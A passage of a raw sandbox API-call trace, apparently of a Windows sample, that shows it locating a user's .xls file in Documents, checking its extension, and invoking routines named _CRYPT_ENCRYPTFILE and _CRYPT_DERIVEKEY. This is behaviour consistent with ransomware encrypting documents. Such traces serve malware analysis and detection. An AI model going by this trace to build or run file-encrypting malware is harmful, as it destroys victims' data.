lpString2=".", cchCount2=1) returned 3 [0172.634] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ls", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0172.634] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xls", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0172.635] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".xls", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0172.635] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0172.635] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0172.635] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0172.635] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0172.635] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0172.635] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0172.635] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0172.635] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0172.635] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0172.635] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\oxnDwHiXTyJqTe06unb5.xls", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbabf6780, ftCreationTime.dwHighDateTime=0x1d5d9e2, ftLastAccessTime.dwLowDateTime=0x817489c0, ftLastAccessTime.dwHighDateTime=0x1d5de3c, ftLastWriteTime.dwLowDateTime=0x817489c0, ftLastWriteTime.dwHighDateTime=0x1d5de3c, nFileSizeHigh=0x0, nFileSizeLow=0x14707, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="oxnDwHiXTyJqTe06unb5.xls", cAlternateFileName="OXNDWH~1.XLS")) returned 0x90add8 [0172.636] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0172.636] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0172.637] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\oxnDwHiXTyJqTe06unb5.xls", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbabf6780, ftCreationTime.dwHighDateTime=0x1d5d9e2, ftLastAccessTime.dwLowDateTime=0x817489c0, ftLastAccessTime.dwHighDateTime=0x1d5de3c, ftLastWriteTime.dwLowDateTime=0x817489c0, ftLastWriteTime.dwHighDateTime=0x1d5de3c, nFileSizeHigh=0x0, nFileSizeLow=0x14707, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="oxnDwHiXTyJqTe06unb5.xls", cAlternateFileName="OXNDWH~1.XLS")) returned 0x90add8 [0172.637] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0172.637] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0172.637] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\oxnDwHiXTyJqTe06unb5.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0172.637] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\oxnDwHiXTyJqTe06unb5.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0172.637] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\oxnDwHiXTyJqTe06unb5.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0172.637] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\oxnDwHiXTyJqTe06unb5.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0172.637] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\oxnDwHiXTyJqTe06unb5.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.637] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\oxnDwHiXTyJqTe06unb5.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.637] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\oxnDwHiXTyJqTe06unb5.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0172.637] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\oxnDwHiXTyJqTe06unb5.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.637] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\oxnDwHiXTyJqTe06unb5.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.637] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\oxnDwHiXTyJqTe06unb5.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0172.637] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\oxnDwHiXTyJqTe06unb5.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0172.638] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\oxnDwHiXTyJqTe06unb5.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.638] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\oxnDwHiXTyJqTe06unb5.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0172.638] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\oxnDwHiXTyJqTe06unb5.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.638] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\oxnDwHiXTyJqTe06unb5.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.638] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\oxnDwHiXTyJqTe06unb5.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.638] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\oxnDwHiXTyJqTe06unb5.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.638] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\oxnDwHiXTyJqTe06unb5.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.638] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\oxnDwHiXTyJqTe06unb5.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0172.638] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\oxnDwHiXTyJqTe06unb5.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.638] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Documents\\KwBYebiNhHcjLML\\oxnDwHiXTyJqTe06unb5.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.638] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Documents\\KwBYebiNhHcjLML\\oxnDwHiXTyJqTe06unb5.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0172.638] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Documents\\KwBYebiNhHcjLML\\oxnDwHiXTyJqTe06unb5.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.638] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Documents\\KwBYebiNhHcjLML\\oxnDwHiXTyJqTe06unb5.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0172.638] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Documents\\KwBYebiNhHcjLML\\oxnDwHiXTyJqTe06unb5.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.638] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Documents\\KwBYebiNhHcjLML\\oxnDwHiXTyJqTe06unb5.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.638] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Documents\\KwBYebiNhHcjLML\\oxnDwHiXTyJqTe06unb5.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.638] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Documents\\KwBYebiNhHcjLML\\oxnDwHiXTyJqTe06unb5.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0172.638] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Documents\\KwBYebiNhHcjLML\\oxnDwHiXTyJqTe06unb5.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.638] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Documents\\KwBYebiNhHcjLML\\oxnDwHiXTyJqTe06unb5.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.638] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Documents\\KwBYebiNhHcjLML\\oxnDwHiXTyJqTe06unb5.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0172.638] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Documents\\KwBYebiNhHcjLML\\oxnDwHiXTyJqTe06unb5.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0172.638] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ocuments\\KwBYebiNhHcjLML\\oxnDwHiXTyJqTe06unb5.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.638] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cuments\\KwBYebiNhHcjLML\\oxnDwHiXTyJqTe06unb5.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0172.638] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uments\\KwBYebiNhHcjLML\\oxnDwHiXTyJqTe06unb5.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.639] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ments\\KwBYebiNhHcjLML\\oxnDwHiXTyJqTe06unb5.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.639] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ents\\KwBYebiNhHcjLML\\oxnDwHiXTyJqTe06unb5.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0172.639] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nts\\KwBYebiNhHcjLML\\oxnDwHiXTyJqTe06unb5.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.639] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ts\\KwBYebiNhHcjLML\\oxnDwHiXTyJqTe06unb5.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.639] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\KwBYebiNhHcjLML\\oxnDwHiXTyJqTe06unb5.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.639] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\KwBYebiNhHcjLML\\oxnDwHiXTyJqTe06unb5.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0172.639] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="KwBYebiNhHcjLML\\oxnDwHiXTyJqTe06unb5.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.639] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wBYebiNhHcjLML\\oxnDwHiXTyJqTe06unb5.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.639] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BYebiNhHcjLML\\oxnDwHiXTyJqTe06unb5.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0172.639] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YebiNhHcjLML\\oxnDwHiXTyJqTe06unb5.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.639] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ebiNhHcjLML\\oxnDwHiXTyJqTe06unb5.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0172.639] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="biNhHcjLML\\oxnDwHiXTyJqTe06unb5.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0172.639] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iNhHcjLML\\oxnDwHiXTyJqTe06unb5.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.639] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NhHcjLML\\oxnDwHiXTyJqTe06unb5.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.639] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hHcjLML\\oxnDwHiXTyJqTe06unb5.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.639] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HcjLML\\oxnDwHiXTyJqTe06unb5.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.639] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cjLML\\oxnDwHiXTyJqTe06unb5.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0172.639] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jLML\\oxnDwHiXTyJqTe06unb5.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.639] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LML\\oxnDwHiXTyJqTe06unb5.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.639] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ML\\oxnDwHiXTyJqTe06unb5.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.639] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="L\\oxnDwHiXTyJqTe06unb5.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.639] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\oxnDwHiXTyJqTe06unb5.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0172.639] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oxnDwHiXTyJqTe06unb5.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.639] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xnDwHiXTyJqTe06unb5.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.639] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nDwHiXTyJqTe06unb5.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.639] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DwHiXTyJqTe06unb5.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0172.639] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wHiXTyJqTe06unb5.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.640] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HiXTyJqTe06unb5.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.640] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iXTyJqTe06unb5.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.640] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XTyJqTe06unb5.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.640] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TyJqTe06unb5.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.640] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="yJqTe06unb5.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.640] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JqTe06unb5.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.640] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="qTe06unb5.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.640] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Te06unb5.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.640] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="e06unb5.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0172.640] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="06unb5.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0172.640] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6unb5.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0172.640] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0172.640] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0172.640] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0172.640] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0172.640] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0172.640] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ls", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0172.640] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xls", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0172.640] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".xls", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0172.640] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0172.640] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0172.640] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0172.640] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0172.641] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.641] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\oxnDwHiXTyJqTe06unb5.xls", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbabf6780, ftCreationTime.dwHighDateTime=0x1d5d9e2, ftLastAccessTime.dwLowDateTime=0x817489c0, ftLastAccessTime.dwHighDateTime=0x1d5de3c, ftLastWriteTime.dwLowDateTime=0x817489c0, ftLastWriteTime.dwHighDateTime=0x1d5de3c, nFileSizeHigh=0x0, nFileSizeLow=0x14707, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="oxnDwHiXTyJqTe06unb5.xls", cAlternateFileName="OXNDWH~1.XLS")) returned 0x90af58 [0172.641] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0172.641] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.641] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0172.641] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0172.641] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0172.641] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0172.641] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0172.641] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0172.641] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0172.641] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0172.641] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0172.642] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0172.642] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0172.642] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0172.642] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0172.642] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0172.642] PeekMessageW (in: lpMsg=0x87eac4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eac4) returned 0 [0172.642] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0172.642] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0b78) returned 1 [0172.643] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0172.643] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0172.643] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0172.643] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0172.643] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0172.643] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0172.643] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0172.643] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0172.643] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0172.643] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0172.643] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0172.644] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0172.644] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.644] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.644] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.644] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0172.644] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.645] PeekMessageW (in: 